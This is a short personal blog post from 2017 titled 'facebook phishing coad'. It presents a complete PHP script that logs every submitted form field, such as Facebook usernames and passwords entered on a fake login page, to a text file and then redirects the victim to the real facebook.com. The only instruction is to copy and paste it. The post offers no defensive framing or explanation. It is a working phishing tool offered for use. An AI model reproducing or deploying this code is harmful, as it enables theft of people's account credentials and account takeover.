Hey guys! My name is "Sagar Kumar Dubey" but you can also call me "Sagar CYBER Expert"! In this Blog you will find Cyber Security,Tips&Tricks,Latest Cyber and Network News and many more....

Pages

Saturday, June 17, 2017

facebook phishing coad

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Just copy and past in notepade
Share:

0 comments:

Post a Comment

sagar dubey. Powered by Blogger.

About Us

Welcome to sagarghost.blogspot.in We are here to help to many people who are wants or in search of Tips&Tricks,cyber security,Wants to Know Latest cyber and network news. Here You will Find all Related Resources... For absolutely free!!!